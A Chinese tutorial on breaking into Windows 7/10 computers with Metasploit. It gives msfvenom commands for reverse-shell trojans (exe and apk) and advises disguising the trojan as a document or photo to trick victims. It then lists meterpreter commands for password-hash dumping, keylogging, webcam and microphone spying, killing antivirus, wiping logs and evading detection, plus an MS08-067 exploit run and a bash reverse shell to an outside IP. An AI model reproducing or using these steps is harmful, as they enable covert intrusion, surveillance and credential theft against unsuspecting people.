msf exploit入侵电脑(Win7/Win10皆可)

需要的工具:msfvenom . msfconsole (kali里面有)

msfvenom -p windows/meterpreter/reverse_tcp LHOST=本地ip LPORT=本地端口号 –f exe –o 文件名.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.60.144 LPORT=6666 -f exe -o test.exe

# 也可以尝试生成安卓手机的恶意软件,在此不推荐尝试
msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.60.144 LPORT=8888 R> test.apk


即生成一个后门文件test.exe

然后继续执行命令:

msfconsole (运行msfconsole)

msf>use exploit/multi/handler (选择模块)
输入命令show payloads会显示出有效的攻击载荷,比如shell_reverse_tcp。
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
set lhost 加ip地址
set lport 加端口号

msf exploit(handler) > exploit -z -j (后台执行)

这样木马就配置好了,然后发给别人(可以伪造成文档,照片,软件等文件骗取别人打开)

发给别人后,等待别人打开test.exe,打开即上钩了

msf exploit(handler) > sessions(查看上钩的用户)

msf exploit(handler) > sessions -i 1(选择需要攻击的用户,这里选择第 1 个)

进入meterpreter了,即可进行一些相关的木马操作。

background:这个命令是将当前的session放到后台运行,可以在msf中继续其他渗透任务;
sessions:这个命令需要配合上面的background使用,该命令是将后台的会话打开,进行会话操作。
clearev:该命令是用来清除渗透的登录信息的,这个很有用。
hashdump:该命令是一个post模块,需要配合meterpreter使用,这个命令是用来获取目标系统的哈希值的
meterpreter > run post/windows/gather/hashdump
migrate:这个也是一个post模块。可以将meterpreter当前的进程移动到其他指定的进程中,这样做的好处是可以给meterpreter一个相对稳定的运行环境,同时可以很好的躲避杀软。
meterpreter > run post/windows/manage/migrate
webcam_list:列举摄像头。
webcam_snap:通过远程连接目标系统的摄像头。
run killav:关闭对方的杀软,其实关闭杀软也可以进入cmd中手动关闭。

meterpreter
meterpreter是更高级的payload。
纯内存工作模式(不写硬盘),避免被电子取证;加密的通信协议,对传输过程进行加密;易于扩展。

基本命令

 msf > use exploit/windows/smb/ms08_067_netapimsf exploit(ms08_067_netapi) > set rhost 192.168.80.148msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcpmsf exploit(ms08_067_netapi) > set lhost 192.168.80.163msf exploit(ms08_067_netapi) > exploit -jmsf exploit(ms08_067_netapi) > sessions -i 1  进入meterpreter类型的shell

 meterpreter > background  退出到msf命令提示符下meterpreter > lpwd  等价于在kali上输入pwdmeterpreter > lcd /etc  等价于在kali上输入cd /etcmeterpreter > run post/windows/gather/smart_hashdump  获取目标主机上用户的hash值meterpreter > run post/windows/capture/keylog_recorder  键盘记录meterpreter > run killav  结束目标主机上的杀毒软件相关进程meterpreter > clearev  清除系统日志meterpreter > download boot.ini  下载目标主机上的boot.ini文件meterpreter > upload /usr/share/windows-binaries/nc.exe c:\\windows\\system32  上传nc.exe到目标主机上。(注意要使用2个反斜杠)meterpreter > dir windows\\system32\\nc.exemeterpreter > execute -f nc -nvlp 3333  执行nc.exemeterpreter > execute -f "bash -i >& /dev/tcp/104.199.1.1/82 0>&1"meterpreter > execute -f bash -i -Hmeterpreter > execute -f cmd.exe -i -H  获得目标主机的shell,-i交互模式,-H隐藏meterpreter > execute -H -m -d calc.exe -f wce32.exe -a "-o foo.txt"meterpreter > cat foo.txt

-m 直接从内存中执行攻击端的可执行文件,不在硬盘存储,所以不会留下痕迹,且能避开杀毒软件的查杀;-d 设置需要显示的进程名,可以避开敏感人士的检查。

 meterpreter > getuid  查看当前用户meterpreter > getsystem  提权到system用户meterpreter > getprivs  查看当前用户具有的权限meterpreter > getpid  查看meterpreter注入到了什么进程中meterpreter > migrate 1436   更改到pid1436进程中meterpreter > getpid  重新使用getpid命令查看meterpreter > hashdump  获取目标主机上用户的hash值meterpreter > sysinfo  查看目标系统的信息meterpreter > kill 188  结束188进程meterpreter > shell  获取目标操作系统的shellmeterpreter > idletime  查看目标主机已经空闲了多长时间meterpreter > edit C:\\Windows\\System32\\drivers\\etc\\hosts  编辑hosts文件meterpreter > record_mic -d 10 -f /root/桌面/1.mp4  监听麦克风meterpreter > load python  加载python插件

MSF Exploit入侵电脑实践(Win7/Win10皆可)相关推荐

  1. win 7 我的计算机,从“我的电脑”到“此电脑”,Win7/Win10为啥这么改?

    Win7之家( www.win7china.com):从"我的电脑"到"此电脑",Win7/Win10为啥这么改? 在Windows XP之前,桌面上的电脑图标 ...

  2. 计算机主机信息怎么看,本机电脑硬件配置信息怎么看?Win7/Win10查看详细电脑配置方法...

    电脑配置决定了一台电脑的性能好坏,如果电脑配置没有达到游戏或者软件的要求,那么肯定无法流畅运行的.对于一些小白用户不知道如何查看电脑硬件配置,那么本机电脑硬件配置信息怎么看?下面装机之家小编分享一下W ...

  3. win系统流畅度测试软件,视频对比:老电脑装Win7、Win10流畅性测试

    原标题:视频对比:老电脑装Win7.Win10流畅性测试 Windows 10号称比Win7快30%,那么对于旧电脑来说,这一说法还成立吗? 下面网易找来了两台完全相同的三年前售价四千左右的主流电脑, ...

  4. 低配本用win10服务器系统,低配电脑用win7还是win10比较好_低配置电脑装win7还是win10系统合适...

     对于一些比较低配置的电脑,很多用户不知道要用win7系统还是win10系统比较好,其实这两个系统配置没有差很多,主要还是得根据自己电脑的时机配置并结合官网给出的最低配置要求来选择,下面就给大家分享 ...

  5. 戴尔服务器改win7系统,戴尔电脑怎么把Win10系统改装win7系统?

    戴尔电脑怎么把Win10系统改装win7系统?现在几乎所有出厂的电脑,预装的系统都是Win10系统,而且如果贸然装win7的话根本装不上,而今天,小编就带着大家学习一下怎么使用戴尔电脑改装win7系统 ...

  6. 禁用计算机通信端口,win7/win10系统电脑禁用445端口的详细教程

    全球电脑正遭受WannaCry勒索病毒的攻击,网上有效的解决方法就是禁用445端口,445端口有什么作用?445端口是用于支持文件和打印机共享服务的端口,WannaCry勒索病毒就是利用这个端口进行大 ...

  7. 电脑装了win10系统,还能重装win7系统吗?

    电脑装了win10系统,还能重装win7系统吗? 现在电脑新买的基本上都是win10的系统,只有旧电脑才是有搭载着win7系统,win7和win10之间没有说谁更好,各有千秋各有需求,只是顺着网络科技 ...

  8. C#获取电脑系统信息和硬件信息,兼容XP/Win7/Win10(依赖System.Management.dll)

    文章目录 一.前言 二.具体实现 1.引入System.Management.dll 2.引入命名空间 3.获取系统信息 4.获取CPU信息 5.获取内存信息 6.获取硬盘信息 7.获取显卡信息 三. ...

  9. win7/win10电脑屏幕录像工具?

    目前windows系统中,windows 7系统是没有自带的录屏软件,windows 10系统也是对电脑型号有要求,所以在录屏的时候,就需要通过其他三方工具去处理,下载安装,一款优质录屏软件可以给我们 ...

  10. WIN7/win10电脑清理文件、拷贝文件很慢的处理方法

    我们在使用WIN7/win10电脑清理文件.拷贝文件的时候,有些时候莫名其妙变慢了,按照以下方法处理即可. 打开我的电脑-管理 选择服务与应用程序-服务 Application Information ...

最新文章

  1. Matlab学习笔记——图形标注
  2. 物联网 android前景,物联网现状及未来前景分析
  3. 寻找一个字符串中所有重复字符的索引
  4. ASP.NET发送电子邮件
  5. 删除鼠标右键打开方式其他程序图标
  6. java多线程队列_java多线程消费者生产者模式(BlockingQueue 通过阻塞队列实现)
  7. Problem C: 结构体---点坐标结构体
  8. 【Java】获取并打印当前堆栈的方法
  9. 在Ubuntu 14.04上安装 Webmin
  10. linux 设备驱动初学(一)
  11. 整装待发 QTA UI自动化测试框架迎来大更新
  12. 编程序,输入年份和月份,输出本月有多少天。合理选择分支语句完成设计任务。
  13. 新手程序员之初生牛犊不怕虎
  14. 11、深圳经济特区数据条例
  15. 植物大战僵尸存档关卡和金币修改
  16. Spring+SpringMVC+Mybatis开发
  17. LINUX磁盘分区挂载笔记
  18. 【go】ssa和调用链分析
  19. vs2017 无法打开源文件afx.h
  20. python实现堆栈_Python堆栈实现计算器

热门文章

  1. 玲珑3D与几何画板的比较
  2. moudbus报文解析
  3. java jbutton间隔_如何通过百分比设置JButton宽度? - java
  4. Ios 12 linux,iOS12.3~12.4.2支持越狱?包括 A12 设备
  5. c语言日历程序实验报告,万年历实验报告.doc
  6. 斐讯N1强制刷机-免拆版
  7. Mac fliqlo 时钟屏保
  8. vbs socket
  9. PR片头片尾模板 蝴蝶飞舞动态粒子爆炸效果logo展示pr视频模板
  10. 谢尔宾斯基三角形——python递归